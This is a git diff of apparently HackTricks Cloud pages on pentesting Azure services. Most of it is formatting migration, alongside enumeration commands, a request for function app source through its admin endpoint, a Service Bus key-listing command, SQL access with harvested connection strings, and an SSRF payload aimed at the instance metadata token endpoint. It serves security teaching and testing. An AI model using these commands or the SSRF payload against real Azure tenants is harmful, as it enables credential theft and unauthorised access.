@@ -270,33 +248,19 @@ az rest --method GET \ curl "?code=" ## Python example curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=" -v - + # Get source code az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` -{% endcode %} ## Privilege Escalation -{% content-ref url="../az-privilege-escalation/az-functions-app-privesc.md" %} -[az-functions-app-privesc.md](../az-privilege-escalation/az-functions-app-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-functions-app-privesc.md +{{#endref}} ## References -* [https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition](https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition) +- [https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition](https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md similarity index 52% rename from pentesting-cloud/azure-security/az-services/az-logic-apps.md rename to src/pentesting-cloud/azure-security/az-services/az-logic-apps.md index 051da854b..e97474bec 100644 --- a/pentesting-cloud/azure-security/az-services/az-logic-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md @@ -1,19 +1,6 @@ # Az - Logic Apps -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -23,14 +10,14 @@ Logic Apps provides a visual designer to create workflows with a **wide range of ### Examples -* **Automating Data Pipelines**: Logic Apps can automate **data transfer and transformation processes** in combination with Azure Data Factory. This is useful for creating scalable and reliable data pipelines that move and transform data between various data stores, like Azure SQL Database and Azure Blob Storage, aiding in analytics and business intelligence operations. -* **Integrating with Azure Functions**: Logic Apps can work alongside Azure Functions to develop **sophisticated, event-driven applications that scale as needed** and integrate seamlessly with other Azure services. An example use case is using a Logic App to trigger an Azure Function in response to certain events, such as changes in an Azure Storage account, allowing for dynamic data processing. +- **Automating Data Pipelines**: Logic Apps can automate **data transfer and transformation processes** in combination with Azure Data Factory. This is useful for creating scalable and reliable data pipelines that move and transform data between various data stores, like Azure SQL Database and Azure Blob Storage, aiding in analytics and business intelligence operations. +- **Integrating with Azure Functions**: Logic Apps can work alongside Azure Functions to develop **sophisticated, event-driven applications that scale as needed** and integrate seamlessly with other Azure services. An example use case is using a Logic App to trigger an Azure Function in response to certain events, such as changes in an Azure Storage account, allowing for dynamic data processing. ### Visualize a LogicAPP It's possible to view a LogicApp with graphics: -
+
or to check the code in the "**Logic app code view**" section. @@ -40,18 +27,16 @@ Even if you find the **Logic App vulnerable to SSRF**, you won't be able to acce For example, something like this won't return the token: -{% code overflow="wrap" %} ```bash # The URL belongs to a Logic App vulenrable to SSRF curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v ``` -{% endcode %} ### Enumeration -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash # List az logic workflow list --resource-group --subscription --output table @@ -62,11 +47,11 @@ az logic workflow definition show --name --resource-group --resource-group --subscription ``` -{% endcode %} -{% endtab %} -{% tab title="Az PowerSHell" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="Az PowerSHell" }} + ```powershell # List Get-AzLogicApp -ResourceGroupName @@ -77,21 +62,8 @@ Get-AzLogicApp -ResourceGroupName -Name # Get service ppal used (Get-AzLogicApp -ResourceGroupName -Name ).Identity ``` -{% endcode %} -{% endtab %} -{% endtabs %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +{{#endtab }} +{{#endtabs }} -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
new file mode 100644
index 000000000..78ea357b7
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
@@ -0,0 +1,56 @@
+# Az - Management Groups, Subscriptions & Resource Groups
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Management Groups
+
+You can find more info about Management Groups in:
+
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+### Enumeration
+
+```bash
+# List
+az account management-group list
+# Get details and management groups and subscriptions that are children
+az account management-group show --name --expand --recurse
+```
+
+## Subscriptions
+
+You can find more info about Subscriptions in:
+
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+### Enumeration
+
+```bash
+# List all subscriptions
+az account list --output table
+# Get details
+az account management-group subscription show --name --subscription
+```
+
+## Resource Groups
+
+You can find more info about Resource Groups in:
+
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+### Enumeration
+
+```bash
+# List all resource groups
+az group list
+# Get resource groups of specific subscription
+az group list --subscription "" --output table
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/src/pentesting-cloud/azure-security/az-services/az-queue-enum.md
new file mode 100644
index 000000000..a2ccb7cc9
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-queue-enum.md
@@ -0,0 +1,95 @@
+# Az - Queue Storage
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed.
+
+### Enumeration
+
+{{#tabs }}
+{{#tab name="Az Cli" }}
+
+```bash
+# You need to know the --account-name of the storage (az storage account list)
+az storage queue list --account-name
+
+# Queue Metadata
+az storage queue metadata show --name --account-name
+
+#Get ACL
+az storage queue policy list --queue-name --account-name
+
+# Get Messages (getting a message deletes it)
+az storage message get --queue-name --account-name
+
+# Peek Messages
+az storage message peek --queue-name --account-name
+```
+
+{{#endtab }}
+
+{{#tab name="Az PS" }}
+
+```bash
+# Get the Storage Context
+$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994
+$ctx = $storageAccount.Context
+
+# Set Variables for Storage Account
+$storageAccountName = "queuestorageaccount"
+
+# List Queues
+Get-AzStorageQueue -Context $context
+$queueName = "myqueue"
+
+# Retrieve a specific queue
+$queue = Get-AzStorageQueue -Name $queueName -Context $context
+$queue # Show the properties of the queue
+
+# Retrieve the access policies for the queue
+$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName
+$accessPolicies
+
+# Peek Messages
+$queueMessage = $queue.QueueClient.PeekMessage()
+$queueMessage.Value
+
+# Set the amount of time you want to entry to be 
invisible after read from the queue +# If it is not deleted by the end of this time, it will show up in the queue again +$visibilityTimeout = [System.TimeSpan]::FromSeconds(10) + +# Read the messages from the queue, then show the contents of the messages. +$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout) +$queueMessage.Value +``` + +{{#endtab }} +{{#endtabs }} + +### Privilege Escalation + +{{#ref}} +../az-privilege-escalation/az-queue-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../az-post-exploitation/az-queue-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../az-persistence/az-queue-persistance.md +{{#endref}} + +## References + +- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md similarity index 54% rename from pentesting-cloud/azure-security/az-services/az-servicebus-enum.md rename to src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md index f65b1df8c..9a2b8b490 100644 --- a/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md +++ b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md @@ -1,37 +1,25 @@ # Az - Service Bus Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Service Bus -Azure Service Bus is a cloud-based **messaging service** designed to enable reliable **communication between different parts of an application or separate applications**. It acts as a secure middleman, ensuring messages are safely delivered, even if the sender and receiver aren’t operating simultaneously. By decoupling systems, it allows applications to work independently while still exchanging data or instructions. It’s particularly useful for scenarios requiring load balancing across multiple workers, reliable message delivery, or complex coordination, such as processing tasks in order or securely managing access. +Azure Service Bus is a cloud-based **messaging service** designed to enable reliable **communication between different parts of an application or separate applications**. It acts as a secure middleman, ensuring messages are safely delivered, even if the sender and receiver aren’t operating simultaneously. By decoupling systems, it allows applications to work independently while still exchanging data or instructions. It’s particularly useful for scenarios requiring load balancing across multiple workers, reliable message delivery, or complex coordination, such as processing tasks in order or securely managing access. ### Key Concepts 1. **Queues:** its purpose is to store messages until the receiver is ready. - - Messages are ordered, timestamped, and durably stored. - - Delivered in pull mode (on-demand retrieval). - - Supports point-to-point communication. + - Messages are ordered, timestamped, and durably stored. + - Delivered in pull mode (on-demand retrieval). + - Supports point-to-point communication. 2. **Topics:** Publish-subscribe messaging for broadcasting. - - Multiple independent subscriptions receive copies of messages. - - Subscriptions can have rules/filters to control delivery or add metadata. - - Supports many-to-many communication. 
+ - Multiple independent subscriptions receive copies of messages. + - Subscriptions can have rules/filters to control delivery or add metadata. + - Supports many-to-many communication. 3. **Namespaces:** A container for all messaging components, queues and topics, is like your own slice of a powerful Azure cluster, providing dedicated capacity and optionally spanning across three availability zones. ### Advance Features + Some advance features are: - **Message Sessions**: Ensures FIFO processing and supports request-response patterns. 
@@ -49,21 +37,20 @@ Some advance features are: SAS Policies define the access permissions for Azure Service Bus entities namespace (Most Important One), queues and topics. Each policy has the following components: - - **Permissions**: Checkboxes to specify access levels: - - Manage: Grants full control over the entity, including configuration and permissions management. - - Send: Allows sending messages to the entity. - - Listen: Allows receiving messages from the entity. - - **Primary and Secondary Keys**: These are cryptographic keys used to generate secure tokens for authenticating access. - - **Primary and Secondary Connection Strings**: Pre-configured connection strings that include the endpoint and key for easy use in applications. - - **SAS Policy ARM ID**: The Azure Resource Manager (ARM) path to the policy for programmatic identification. +- **Permissions**: Checkboxes to specify access levels: + - Manage: Grants full control over the entity, including configuration and permissions management. + - Send: Allows sending messages to the entity. + - Listen: Allows receiving messages from the entity. +- **Primary and Secondary Keys**: These are cryptographic keys used to generate secure tokens for authenticating access. +- **Primary and Secondary Connection Strings**: Pre-configured connection strings that include the endpoint and key for easy use in applications. +- **SAS Policy ARM ID**: The Azure Resource Manager (ARM) path to the policy for programmatic identification. ### NameSpace -sku, authrorization rule, +sku, authrorization rule, ### Enumeration -{% code overflow="wrap" %} ```bash # Queue Enumeration az servicebus queue list --resource-group --namespace-name 
@@ -91,33 +78,23 @@ az servicebus queue authorization-rule list --resource-group - az servicebus topic authorization-rule list --resource-group --namespace-name --topic-name az servicebus namespace authorization-rule keys list --resource-group --namespace-name --name ``` -{% endcode %} ### Privilege Escalation -{% content-ref url="../az-services/az-servicebus-privesc.md" %} -[az-servicebus-privesc.md](../az-services/az-servicebus-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-servicebus-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../az-post-exploitation/az-servicebus-post-exploitation.md" %} -[az-servicebus-post-exploitation.md](../az-post-exploitation/az-servicebus-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../az-post-exploitation/az-servicebus-post-exploitation.md +{{#endref}} ## References -* https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0 -* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview -* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli +- https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0 +- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview +- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/az-sql.md b/src/pentesting-cloud/azure-security/az-services/az-sql.md similarity index 70% rename from pentesting-cloud/azure-security/az-services/az-sql.md rename to src/pentesting-cloud/azure-security/az-services/az-sql.md index f99fc4da5..91a4b2cb4 100644 --- a/pentesting-cloud/azure-security/az-services/az-sql.md +++ b/src/pentesting-cloud/azure-security/az-services/az-sql.md @@ -1,21 +1,9 @@ # Az - SQL -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Azure SQL + Azure SQL is a family of managed, secure, and intelligent products that use the **SQL Server database engine in the Azure cloud**. This means you don't have to worry about the physical administration of your servers, and you can focus on managing your data. Azure SQL consists of three main offerings: 
@@ -30,58 +18,56 @@ Azure SQL consists of three main offerings: #### Key Features -* **Always Up-to-Date**: Runs on the latest stable version of SQL Server and Receives new features and patches automatically. -* **PaaS Capabilities**: Built-in high availability, backups, and updates. -* **Data Flexibility**: Supports relational and non-relational data (e.g., graphs, JSON, spatial, and XML). +- **Always Up-to-Date**: Runs on the latest stable version of SQL Server and Receives new features and patches automatically. +- **PaaS Capabilities**: Built-in high availability, backups, and updates. +- **Data Flexibility**: Supports relational and non-relational data (e.g., graphs, JSON, spatial, and XML). #### Purchasing Models / Service Tiers -* **vCore-based**: Choose compute, memory, and storage independently. For General Purpose, Business Critical (with high resilience and performance for OLTP apps), and scales up to 128 TB storag -* **DTU-based**: Bundles compute, memory, and I/O into fixed tiers. Balanced resources for common tasks. - * Standard: Balanced resources for common tasks. - * Premium: High performance for demanding workloads. +- **vCore-based**: Choose compute, memory, and storage independently. For General Purpose, Business Critical (with high resilience and performance for OLTP apps), and scales up to 128 TB storag +- **DTU-based**: Bundles compute, memory, and I/O into fixed tiers. Balanced resources for common tasks. + - Standard: Balanced resources for common tasks. + - Premium: High performance for demanding workloads. #### Deployment Models Azure SQL Database supports flexible deployment options to suit various needs: -* **Single Database**: - * A fully isolated database with its own dedicated resources. - * Great for microservices or applications requiring a single data source. -* **Elastic Pool**: - * Allows multiple databases to share resources within a pool. 
- * Cost-efficient for applications with fluctuating usage patterns across multiple databases. +- **Single Database**: + - A fully isolated database with its own dedicated resources. + - Great for microservices or applications requiring a single data source. +- **Elastic Pool**: + - Allows multiple databases to share resources within a pool. + - Cost-efficient for applications with fluctuating usage patterns across multiple databases. #### Scalable performance and pools -* **Single Databases**: Each database is isolated and has its own dedicated compute, memory, and storage resources. Resources can be scaled dynamically (up or down) without downtime (1–128 vCores, 32 GB–4 TB storage, and up to 128 TB). -* **Elastic Pools**: Share resources across multiple databases in a pool to maximize efficiency and save costs. Resources can also be scaled dynamically for the entire pool. -* **Service Tier Flexibility**: Start small with a single database in the General Purpose tier. Upgrade to Business Critical or Hyperscale tiers as needs grow. -* **Scaling Options**: Dynamic Scaling or Autoscaling Alternatives. - +- **Single Databases**: Each database is isolated and has its own dedicated compute, memory, and storage resources. Resources can be scaled dynamically (up or down) without downtime (1–128 vCores, 32 GB–4 TB storage, and up to 128 TB). +- **Elastic Pools**: Share resources across multiple databases in a pool to maximize efficiency and save costs. Resources can also be scaled dynamically for the entire pool. +- **Service Tier Flexibility**: Start small with a single database in the General Purpose tier. Upgrade to Business Critical or Hyperscale tiers as needs grow. +- **Scaling Options**: Dynamic Scaling or Autoscaling Alternatives. #### Built-In Monitoring & Optimization -* **Query Store**: Tracks performance issues, identifies top resource consumers, and offers actionable recommendations. 
-* **Automatic Tuning**: Proactively optimizes performance with features like automatic indexing and query plan corrections. -* **Telemetry Integration**: Supports monitoring through Azure Monitor, Event Hubs, or Azure Storage for tailored insights. +- **Query Store**: Tracks performance issues, identifies top resource consumers, and offers actionable recommendations. +- **Automatic Tuning**: Proactively optimizes performance with features like automatic indexing and query plan corrections. +- **Telemetry Integration**: Supports monitoring through Azure Monitor, Event Hubs, or Azure Storage for tailored insights. #### Disaster Recovery & Availavility -* **Automatic backups**: SQL Database automatically performs full, differential, and transaction log backups of databases -* **Point-in-Time Restore**: Recover databases to any past state within the backup retention period. -* **Geo-Redundancy** -* **Failover Groups**: Simplifies disaster recovery by grouping databases for automatic failover across regions. +- **Automatic backups**: SQL Database automatically performs full, differential, and transaction log backups of databases +- **Point-in-Time Restore**: Recover databases to any past state within the backup retention period. +- **Geo-Redundancy** +- **Failover Groups**: Simplifies disaster recovery by grouping databases for automatic failover across regions. ### Azure SQL Managed Instance -**Azure SQL Managed Instance** is a Platform as a Service (PaaS) database engine that offers near 100% compatibility with SQL Server and handles most management tasks (e.g., upgrading, patching, backups, monitoring) automatically. It provides a cloud solution for migrating on-premises SQL Server databases with minimal changes. +**Azure SQL Managed Instance** is a Platform as a Service (PaaS) database engine that offers near 100% compatibility with SQL Server and handles most management tasks (e.g., upgrading, patching, backups, monitoring) automatically. 
It provides a cloud solution for migrating on-premises SQL Server databases with minimal changes. #### Service Tiers -* **General Purpose**: Cost-effective option for applications with standard I/O and latency requirements. -* **Business Critical**: High-performance option with low I/O latency for critical workloads. - +- **General Purpose**: Cost-effective option for applications with standard I/O and latency requirements. +- **Business Critical**: High-performance option with low I/O latency for critical workloads. #### Advanced Security Features @@ -109,15 +95,15 @@ Azure SQL Database supports flexible deployment options to suit various needs: ## Enumeration -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} +{{#tabs}} +{{#tab name="az cli"}} + ```bash # List Servers az sql server list # --output table ## List Server Usages az sql server list-usages --name --resource-group -## List Server Firewalls +## List Server Firewalls az sql server firewall-rule list --resource-group --server ## List of Azure Active Directory administrators in a server. az sql server ad-admin list --resource-group --server @@ -178,11 +164,11 @@ az sql midb show --resource-group --name az sql vm list az sql vm show --resource-group --name ``` -{% endcode %} -{% endtab %} -{% tab title="Az PowerShell" %} -{% code overflow="wrap" %} +{{#endtab}} + +{{#tab name="Az PowerShell"}} + ```powershell # List Servers Get-AzSqlServer -ResourceGroupName "" @@ -220,15 +206,14 @@ Get-AzSqlInstanceDatabase -ResourceGroupName -InstanceName < # Lis all sql VM Get-AzSqlVM ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab}} +{{#endtabs}} ### Connect and run SQL queries You could find a connection string (containing credentials) from example [enumerating an Az WebApp](az-app-services.md): -{% code overflow="wrap" %} ```powershell function invoke-sql{ param($query) 
@@ -248,44 +233,29 @@ function invoke-sql{ invoke-sql 'Select Distinct TABLE_NAME From information_schema.TABLES;' ``` -You can also use sqlcmd to access the database. It is important to know if the server allows public connections ```az sql server show --name --resource-group ```, and also if it the firewall rule let's our IP to access: -{% code overflow="wrap" %} +You can also use sqlcmd to access the database. It is important to know if the server allows public connections `az sql server show --name --resource-group `, and also if it the firewall rule let's our IP to access: + ```powershell sqlcmd -S .database.windows.net -U -P -d ``` -{% endcode %} ## References -* [https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql) -* [https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql) -* [https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql) -* [https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql) +- [https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql) +- 
[https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql)
+- [https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql)
+- [https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql)
 ## Privilege Escalation
-{% content-ref url="../az-privilege-escalation/az-sql-privesc.md" %}
-[az-sql-privesc.md](../az-privilege-escalation/az-sql-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-sql-privesc.md
+{{#endref}}
 ## Post Exploitation
-{% content-ref url="../az-post-exploitation/az-sql-post-exploitation.md" %}
-[az-sql-post-exploitation.md](../az-post-exploitation/az-sql-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-post-exploitation/az-sql-post-exploitation.md
+{{#endref}}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-storage.md b/src/pentesting-cloud/azure-security/az-services/az-storage.md
similarity index 62%
rename from pentesting-cloud/azure-security/az-services/az-storage.md
rename to src/pentesting-cloud/azure-security/az-services/az-storage.md
index 9a26f4fbf..1f7427324 100644
--- a/pentesting-cloud/azure-security/az-services/az-storage.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-storage.md
@@ -1,19 +1,6 @@
 # Az - Storage Accounts & Blobs
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 ## Basic Information
@@ -21,48 +8,48 @@ Azure Storage Accounts are fundamental services in Microsoft Azure that provide **Main configuration options**: -* Every storage account must have a **uniq name across all Azure**. -* Every storage account is deployed in a **region** or in an Azure extended zone -* It's possible to select the **premium** version of the storage account for better performance -* It's possible to select among **4 types of redundancy to protect** against rack, drive and datacenter **failures**. +- Every storage account must have a **uniq name across all Azure**. +- Every storage account is deployed in a **region** or in an Azure extended zone +- It's possible to select the **premium** version of the storage account for better performance +- It's possible to select among **4 types of redundancy to protect** against rack, drive and datacenter **failures**. **Security configuration options**: -* **Require secure transfer for REST API operations**: Require TLS in any communication with the storage -* **Allows enabling anonymous access on individual containers**: If not, it won't be possible to enable anonymous access in the future -* **Enable storage account key access**: If not, access with Shared Keys will be forbidden -* **Minimum TLS version** -* **Permitted scope for copy operations**: Allow from any storage account, from any storage account from the same Entra tenant or from storage account with private endpoints in the same virtual network. 
